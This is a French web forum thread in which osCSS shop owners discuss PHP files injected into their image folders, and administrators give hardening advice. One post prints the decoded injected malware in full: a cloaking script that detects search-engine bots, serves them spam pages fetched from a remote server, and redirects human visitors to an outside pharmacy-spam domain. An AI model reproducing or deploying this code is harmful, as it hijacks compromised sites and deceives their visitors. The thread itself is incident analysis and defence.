Injection de fichier dans le dossier image

Version stable courante
téléchargement osCSS 1.2.2 RC

Injection de fichier dans le dossier image

Messagepar Marks » Mer 01 Déc 2010, 16:30

Bonjour j'ai 2 sites qui fonctionne tout deux sur osCss 2.0 et les deux on subit une injection de fichier php dans le dossier images provoquant la saturation et la mis hors ligne du serveur . Y à t-il quelque chose à faire pour éviter a l'avenir se genre de problème ?
Merci d'avance
Marks
Membre inactif
 
Messages: 7
Inscription: Mer 01 Déc 2010, 16:15

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 16:38

La , comme ca ?

Quel sont les droit sur le dossier image. Dedie ou mutualisé ?

Theoriquement , pour pousser quelques chose dans le dossier image, il faut le faire a travers un script ? hors les seul script a interenir sur le dossier image appartienne a l''admin. Et la class de construction des miniatures (Celle ci ne prend pas en compte de donnée exterieurs..).


D'autre part, je suis en train de reflechir à une piste que je n'ai pas encore testé.
Gerer le fait de renomer le dossier image , et exploiter la reecriture d'adresse pour maquer le chemin reel des images..

D'autre part, quelle est la revision de tes versions ? Logiquement tu as un fichier oscss.version.xml dans common .
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 16:43

Tiens une base de code supp pour ton htaccess

http://blog.galerie-cesar.com/proteger- ... -htaccess/

Je rajouterai ca dans le htaccess de base lors install
cf track http://dev.oscss.org/task/752
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar Marks » Mer 01 Déc 2010, 17:01

Bonjour,
merci déjà pour l'aide rapide . Donc mes 2sites fonctionnes sous des serveurs dédiés, le répertoire des images était en 777.
A priori l'injection c'est faite par script . Par contre je n'ai pas ou plus le dossier common sur le ftp
Marks
Membre inactif
 
Messages: 7
Inscription: Mer 01 Déc 2010, 16:15

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 17:05

??
pas de dossier common ? Il est obligatoire pour le fonctionnement de la boutique, tant coté public que privé !

Tu à bien une shop En 2.xx ?

Il y as des caches sur beaucoup de class, contenu dans le dossier common. Ce qui peu rendre temporairement ta boutique encore opérationnel , mais j'en doute .

Quel est la revision de ta boutique ??
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar Marks » Mer 01 Déc 2010, 17:34

Ben la les sites sont désactivé.
Voici ce qu'il y a de marqué dans le fichier index.php
/*
$Id: index.php,v 1.5 2005/10/05 14:51:39 stepibou Exp $
+-----------------------------------------------------------------------+
| osCSS Open Source E-commerce |
+-----------------------------------------------------------------------+
| Copyright (c) 2005 The osCSS developers |
| |
| http://www.counteractdesign.com |
| |
| Portions Copyright (c) 2003 osCommerce |
+-----------------------------------------------------------------------+
| This source file is subject to version 2.0 of the GPL license, |
| available at the following url: |
| http://www.counteractdesign.com/license/2_0.txt. |
+-----------------------------------------------------------------------+
*/
Marks
Membre inactif
 
Messages: 7
Inscription: Mer 01 Déc 2010, 16:15

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 17:38

Ok, donc il s'gait d'une 1.2.xx et pas la generation 2.xxx

(JE deplace ton message dans la section approprié)

Cela dit, le liens vers secu supp via htaccess est toujours valable.

D'autre part, as tu mis a jour tes boutique, liée au pbs de secu ? Fait une recherche sur le forum , tu trouvera ce qu'il te manque, mais la base de secu reste à la discretion du webmaster ds les 1.xxx
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar Marks » Mer 01 Déc 2010, 17:53

Mes boutique sont actuellement hors ligne donc ils sont encore sur l'ancienne c'est à dire 1.2.xx . dois-je les mettre à jour ? et l'upgrade ce fait t-elle 'facilement' sans risque de pb lié au template ou à la base de donnée ?
Marks
Membre inactif
 
Messages: 7
Inscription: Mer 01 Déc 2010, 16:15

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 17:58

Non,

Pour passer de la 1.xx vers la 2.xx pour les donnée c'est possible , pas pour le template.
voir http://oscss.org/wiki/oscss-2-xxx/admin ... css-1-vers

Donc, pas tout a fait simple, en fonction de ton niveau.

Il s'agit d'une version différente !!, pas d'une evolution de la 1.xx, mais une 2 ;)
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar Marks » Mer 01 Déc 2010, 18:04

Ok donc je pense que je vais rester sur la version actuel alors le problème est au niveau des fichiers injecté . Faut-il que remettre les fichier par défaut ? ou juste enlever les fichier injecté ?
Marks
Membre inactif
 
Messages: 7
Inscription: Mer 01 Déc 2010, 16:15

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 18:07

tout depend des element (module/hack) installé sur tes shop.

Mais par secu, je pense que je repartirai sur les originaux, afin de garantir qu'aucun fichier infecté n'existent
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar Marks » Mer 01 Déc 2010, 18:17

pour ceux que j'ai trouver se sont des fichiers php avec pour nom googlexxxxxxxxx.php après je c pas si le hack à pus modifier les fichier en dur dans oscss
Marks
Membre inactif
 
Messages: 7
Inscription: Mer 01 Déc 2010, 16:15

Re: Injection de fichier dans le dossier image

Messagepar oscim » Mer 01 Déc 2010, 18:32

Si les droit sur les fihcier et ou dossier n'etait pas correct, c'est possible

Si tu a conservé une backup fait un Diff
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar homer81737D46 » Jeu 02 Déc 2010, 14:55

J ai eu le meme soucis sur la version 1.2.1
je vais faire un diff

mais ça n empêche pas que j aimerais bien savoir comment ils sont rentrés
leur code est lisible après décodage :

Code: Tout sélectionner
@error_reporting(0);
$url_path="http://xxx.xxx.xxx.xxx/2010/11/11/modelpro.fr/1/";
   $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
   $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
   $server_referer = @$_SERVER['HTTP_REFERER'];
   $server_host = @$_SERVER['HTTP_HOST'];
   $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
   $server_remote_addr = @$_SERVER['REMOTE_ADDR'];
   $server_query_string = @$_SERVER['QUERY_STRING'];
   $server_signature = @$_SERVER['SERVER_SIGNATURE'];
   $server_request = @$_SERVER['REQUEST_URI'];


$perm = find_permition();

if (!empty($perm))

{
    $is_human = @detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer);

    $p = $_GET["adv"].".html";
    if (@$is_human==false)
      {//TEST
             $content = getPage($url_path.$p, $perm);
             print $content;
             exit();
        }
      else
      {
         $keys = "/phentermine|adipex|valium|diazepam|lunesta|modalert|provigil|modafinil|ultram|tramadol|proventil|accutane|cialas|aciphex|acomplia|acyclovir|adalat|albendazole|albenza|albuterol|aldactone|alendronate|allegra|alprazolam|altace|amaryl|ambien|amiloride|amlodipine|amoxicillin|ansaid|arava|arcoxia|atenolol|ativan|atorvastatin|avandia|avapro|avodart|aygestin|azathioprine|azithromycin|baclofen|bactrim|benazepril|benzodiazepine|biaxin|bisoprolol|bromocriptine|bupropion|calan|carbamazepine|carisoprodol|carvedilol|ceclor|cefaclor|cefpodoxime|celebrex|celecoxib|cetirizine|chlorambucil|cialis|clarinex|clarithromycin|claritin|clonazepam|clopidogrel|colospa|conjugated|coreg|coumadin|coversyl|cyproheptadine|danazol|danocrine|desloratadine|desyrel|digoxin|dilantin|dipyridamole|domperidone|dutasteride|effexor|eldepryl|enalapril|epivir|erythromycins|escitalopram|esomeprazole|estrace|estradiol|ethambutol|etoricoxib|evista|ezetimibe|famciclovir|famvir|felodipine|fenofibrate|fexofenadine|finasteride|flagyl|flavoxate|flomax|floxin|fluoxetine|flurbiprofen|fosamax|frumil|furosemide|gabapentin|gemfibrozil|geodon|glimepiride|glipizide|glucophage|glucotrol|hydroch|hytrin|hyzaar|ibuprofen|ilosone|imdur|imitrex|imuran|indapamide|inderal|irbesartan|isordil|isosorbide|kamagra|ketoconazole|klonopin|lamictal|laminuvide|lamisil|lamotrigine|lanoxin|lansoprazole|lasix|leflunomide|lenor72|leukeran|levaquin|levitra|levlen|levofloxacin|levonorgestrel|levothroid|levothyroxine|lexapro|lioresal|lipitor|lisinopril|lopid|lopressor|loratadine|lorazepam|losartan|lotensin|lovastatin|loxapine|loxitane|lozol|mebeverine|medroxy|mefenamicacid|meloxicam|meridia|metformin|metoclopramide|metoprolol|metronidazole|mevacor|mexiletine|mexitil|microzide|minipress|mobic|montelukast|motilium|motrin|myambutol|nabumetone|naprosyn|naproxen|neurontin|nexium|nifedipine|nimodipine|nimotop|niravam|nizoral|nolvadex|norethindrone|norplant72|nortriptyline|norvasc|ofloxacin|omeprazole|orlistat|oseltami|pamelor|pantoprazole|parlodel|paroxetine|paxil|periactin|perindropril|persantine|phenergan|phenytoin|plavix|plendil|ponstel|prandin|pravachol|pravastatin|prazosin|prednisolone|prednisone|premarin|prevacid|prilosec|prograf|promethazine|propafenone|propecia|propranolol|proscar|protonix|provera|prozac|rabeprazole|raloxifene|ramipril|ranitidine|reductil|reglan|relafen|repaglinide|retrovir|rimonabant|risperdal|risperidone|rivotril|rosiglitazonemaleate|roxithromycin|rulide|rythmol|selegiline|sertraline|sibutramine|sildenafil|simvastatin|singulair|soma|spironolactone|stavudine|sulfamet|sumatriptan|sumycin|synthroid|tacrolimus|tadalafil|tamiflu|tamoxifen|tamsulosin|tegaserod|tegretol|tenormin|terazosin|terbinafine|tetracycline|topamax|topiramate|trazodone|tricor|trimox|urispas|valacyclovir|valtrex|vantin|vardenafil|vasotec|venlafaxine|verapamil|viagra|warfarin|xanax|xenical|zantac|zebeta|zelnorm|zerit|zestril|zetia|zidovudine|zimulti|ziprasidone|zithromax|zocor|zoloft|zolpidem|zovirax|zyban|zyrtec|windows|indesign|corel|revatio|autodesk/i";

               if (preg_match($keys, $_SERVER["HTTP_REFERER"]))
                  {
                  $key = $_SERVER["HTTP_REFERER"];
                  $sese="unknown";
                  $scheme = "2";   
                  if (eregi("yahoo", $_SERVER["HTTP_REFERER"]))
                     {
                        $keys = explode ("p=", $_SERVER["HTTP_REFERER"]);
                        $keys = explode ("&", $keys[1]);
                        $key = $keys[0];      
                        $sese="yahoo";
                     }
                  if (eregi("google", $_SERVER["HTTP_REFERER"]))
                     {
                        $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                        $keys = explode ("&", $keys[1]);
                        $key = $keys[0];
                        $sese="google";   
                     }
                  if (eregi("bing", $_SERVER["HTTP_REFERER"]))
                     {
                        $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                        $keys = explode ("&", $keys[1]);
                        $key = $keys[0];
                        $sese="bing";   
                     }   
                  if (eregi("aol.com", $_SERVER["HTTP_REFERER"]))
                     {
                        $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                        $keys = explode ("&", $keys[1]);
                        $key = $keys[0];
                        $sese="aol";   
                     }
                  if (eregi("ask.com", $_SERVER["HTTP_REFERER"]))
                     {
                        $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                        $keys = explode ("&", $keys[1]);
                        $key = $keys[0];
                        $sese="ask";   
                     }   
                     

                     $location = "http://xentito.com/in.cgi?$scheme&parameter=".$key."&se=".$server_host."&HTTP_REFERER=".$_SERVER["HTTP_REFERER"];
                     header("Location: ".$location);
                     exit;                     
                    }
       }
}

####################################################################################################
function find_permition(){
    $res="";
    if ( ini_get("allow_url_fopen")==1){
        $res="fgc";
    }else{
        if(function_exists('curl_init'))
        $res="curl";
    }
    return $res;
}

function detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer){
   
   $stop_ips_masks = array(
      "/^8\.6\.4[8-9]\.[0-9]+$/",            // NetRange:   8.6.48.0 - 8.6.55.255         Google Inc
      "/^8\.6\.5[0-5]\.[0-9]+$/",            // NetRange:   8.6.48.0 - 8.6.55.255         Google Inc
      "/^64\.233\.1[6-8][0-9]\.[0-9]+$/",      // NetRange:   64.233.160.0 - 64.233.191.255   Google Inc
      "/^64\.233\.19[0-1]\.[0-9]+$/",         // NetRange:   64.233.160.0 - 64.233.191.255   Google Inc
      "/^64\.68\.8[0-7]\.[0-9]+$/",         // NetRange:   64.68.80.0 - 64.68.87.255      Google Inc
      "/^66\.249\.6[4-9]\.[0-9]+$/",         // NetRange:   66.249.64.0 - 66.249.95.255      Google Inc
      "/^66\.249\.[7-8][0-9]\.[0-9]+$/",      // NetRange:   66.249.64.0 - 66.249.95.255      Google Inc
      "/^66\.249\.9[0-5]\.[0-9]+$/",         // NetRange:   66.249.64.0 - 66.249.95.255      Google Inc
      "/^72\.14\.19[2-9]\.[0-9]+$/",         // NetRange:   72.14.192.0 - 72.14.255.255      Google Inc
      "/^72\.14\.2[0-5][0-9]\.[0-9]+$/",      // NetRange:   72.14.192.0 - 72.14.255.255      Google Inc
      "/^74\.125\.[0-9]+\.[0-9]+$/",         // NetRange:   74.125.0.0 - 74.125.255.255      Google Inc
      "/^74\.6\.[0-9]+\.[0-9]+$/",         // NetRange:   74.6.0.0 - 74.6.255.255         Google Inc
      "/^216\.239\.3[2-9]\.[0-9]+$/",         // NetRange:   216.239.32.0 - 216.239.63.255   Google Inc
      "/^216\.239\.4[0-9]\.[0-9]+$/",         // NetRange:   216.239.32.0 - 216.239.63.255   Google Inc
      "/^216\.239\.6[0-3]\.[0-9]+$/",         // NetRange:   216.239.32.0 - 216.239.63.255   Google Inc
      "/^209\.85\.12[8-9]\.[0-9]+$/",         // NetRange:   209.85.128.0 - 209.85.255.255   Google Inc
      "/^209\.85\.1[3-9][0-9]\.[0-9]+$/",      // NetRange:   209.85.128.0 - 209.85.255.255   Google Inc
      "/^209\.85\.2[0-5][0-9]\.[0-9]+$/",      // NetRange:   209.85.128.0 - 209.85.255.255   Google Inc
      "/^65\.5[2-5]\.[0-9]+\.[0-9]+$/",      // NetRange:   65.52.0.0 - 65.55.255.255      Microsoft Corp
      "/^67\.195\.[0-9]+\.[0-9]+$/",         // NetRange:   67.195.0.0 - 67.195.255.255      Yahoo! Inc
      "/^209\.131\.3[2-9]\.[0-9]+$/",            // NetRange:    209.131.32.0 - 209.131.63.255    Yahoo! Inc
      "/^209\.131\.[4-5][0-9]\.[0-9]+$/",        // NetRange:    209.131.32.0 - 209.131.63.255    Yahoo! Inc
      "/^209\.131\.[6][0-3]\.[0-9]+$/",        // NetRange:    209.131.32.0 - 209.131.63.255    Yahoo! Inc
      "/^66\.163\.1[6-8][0-9]\.[0-9]+$/",        // NetRange:    66.163.160.0 - 66.163.191.255    Yahoo! Inc
      "/^66\.163\.19[0-1]\.[0-9]+$/",            // NetRange:    66.163.160.0 - 66.163.191.255    Yahoo! Inc
      "/^64\.9\.22[4-9]\.[0-9]+$/",         // NetRange:   64.9.224.0 - 64.9.255.255      Google Inc
      "/^64\.9\.2[3-4][0-9]\.[0-9]+$/",      // NetRange:   64.9.224.0 - 64.9.255.255      Google Inc
      "/^64\.9\.25[0-5]\.[0-9]+$/",         // NetRange:   64.9.224.0 - 64.9.255.255      Google Inc
      "/^66\.102\.[0-9]\.[0-9]+$/",            // NetRange:    66.102.0.0 - 66.102.15.255        Google Inc
      "/^66\.102\.1[0-5]\.[0-9]+$/",            // NetRange:    66.102.0.0 - 66.102.15.255        Google Inc
      "95\.211\.129\.57",
      "95\.211\.129\.58"
    );

   $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawl", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress",'Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex');

   $server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);

   $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";
   foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("$stop_ip_mask", $server_remote_addr)) {
      $is_human = false;  break;
   }
   if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$server_user_agent) !== false){
      $is_human = false;  break;
   }
   if($is_human and !eregi("^[a-zA-Z]{5,}", @$server_user_agent)) {
      $is_human = false;
   }

   if($is_human and strlen($server_user_agent)<=11) {
      $is_human = false;
   }

   if(stristr($server_referer,$server_query_string)) {
      $is_human = false;
   }

   return $is_human;
}

function getPage($url, $method){
    $res="";
    if ($method=="fgc"){
        $res=file_get_contents($url);
    }
    if ($method=="curl"){
           $ch = curl_init();
           curl_setopt ($ch, CURLOPT_URL,$url);
           curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
           curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
           curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
           curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
           $res = curl_exec ($ch);
           curl_close($ch);
    }
    return $res;
}
function getArray($content){
    $res=explode("\r\n",$content);
    return $res;
}
Inscrivez vous sur la mailing liste OsCSS :
https://lists.sourceforge.net/lists/listinfo/oscss-secu
homer81737D46
Site Admin
 
Messages: 31
Inscription: Lun 21 Déc 2009, 15:28

Re: Injection de fichier dans le dossier image

Messagepar oscim » Jeu 02 Déc 2010, 15:16

As tu securisé tes boutiques?

Protection du rep backup , renommer le dossier admin, supprimer le fichier file_broswer de l'admin , etc.. ???
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar homer81737D46 » Jeu 02 Déc 2010, 16:02

le repertoire backup est ok
le dossier admin est accessible mais seulement en https et il y a un vrai login/mot de passe derriere
pas de fichier file_browser

Le pire c est que je sais plus quoi proposer à mon client, si la version 2 est tout aussi fragile ...
Inscrivez vous sur la mailing liste OsCSS :
https://lists.sourceforge.net/lists/listinfo/oscss-secu
homer81737D46
Site Admin
 
Messages: 31
Inscription: Lun 21 Déc 2009, 15:28

Re: Injection de fichier dans le dossier image

Messagepar Ayatus » Jeu 02 Déc 2010, 16:26

Le https ne fait que crypté les échanges entre le serveur et le client, il ne règle en rien les failles de sécurité.
Avatar de l’utilisateur
Ayatus
Site Admin
 
Messages: 280
Inscription: Sam 19 Avr 2008, 17:23

Re: Injection de fichier dans le dossier image

Messagepar homer81737D46 » Jeu 02 Déc 2010, 16:36

meme si j utilise une adresse de l admin je retombe sur l accueil
URl en pm
c est quand meme pas très facile a violé ça ... si ?
Inscrivez vous sur la mailing liste OsCSS :
https://lists.sourceforge.net/lists/listinfo/oscss-secu
homer81737D46
Site Admin
 
Messages: 31
Inscription: Lun 21 Déc 2009, 15:28

Re: Injection de fichier dans le dossier image

Messagepar oscim » Jeu 02 Déc 2010, 16:43

Plusieurs chose
1 Non la v 2.xx est beaucoup plus protegé
2 comme tous site sur le web, rien n'est proetegé a 100%
3 as tu corrigé les failles de securité de la 1.2.1, sur certainne page public , sur la page contact
3 le fichier define_languages sont ultra sensible et menace la secu
4 dans tous les cas, l'admin ne devrait pas être accesible via /admin
5 les droits sur les fichier et dossier sont correct ??
6 les dossier tres s'ensible comme includes sot proteger pas htaccess ?
7 Les boutiques sont maintenu ? les mise a jour effectué ?
8 Aucunne page dans aucune circonstance ne produit d'erreur fatal, indiqueant les cheminreel vers les fichiers

Petit rappel, comme tous outils les site web DOIVENT être suivi et MAINTENU. De plus il est absoluement necessaire de les securisé, depsui plusieur moi déjà, les oscommerce et forck sont fortement attacké , par tous les faille connu entre autre
Pour un web au normes du W3C, pour un web plus propre !

- Download osCSS Toutes versions
- stable osCSS 2.1.0 (help|info|new dev) Official help|wiki|Tuto for osCSS 2 | doc doxygen
- Utiliser le tracker pour suivre les évolutions et développements
- Inscrivez vos sites sur oscss pour présenter vos réalisations
Avatar de l’utilisateur
oscim
Site Admin
 
Messages: 1643
Inscription: Mar 25 Sep 2007, 11:33

Re: Injection de fichier dans le dossier image

Messagepar homer81737D46 » Jeu 02 Déc 2010, 16:57

non j ai pas tenu a jour, je sais pas le vendre

il est clair que oscommerce est ses enfants sont très attaqué récement (joomla aussi)

j ai un serveur qui tire la sonnette quand des fichiers sont modifié, ajouté, supprimé
je migre en osCSS2_2.1.0_preRC_g1 et tout devrais bien se passé pendant un moment

pour m aider a vendre la solution de mise à jour,
on parle de combien de MAJ critiques par an ?
il y a une mailing list ?

Merci beaucoup pour votre aide dévoué !
longue vie à oscss
Inscrivez vous sur la mailing liste OsCSS :
https://lists.sourceforge.net/lists/listinfo/oscss-secu
homer81737D46
Site Admin
 
Messages: 31
Inscription: Lun 21 Déc 2009, 15:28

Suivante

Retourner vers osCSS 1.2.2 RC

 


  • Articles en relation
    Réponses
    Vus
    Dernier message

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

cron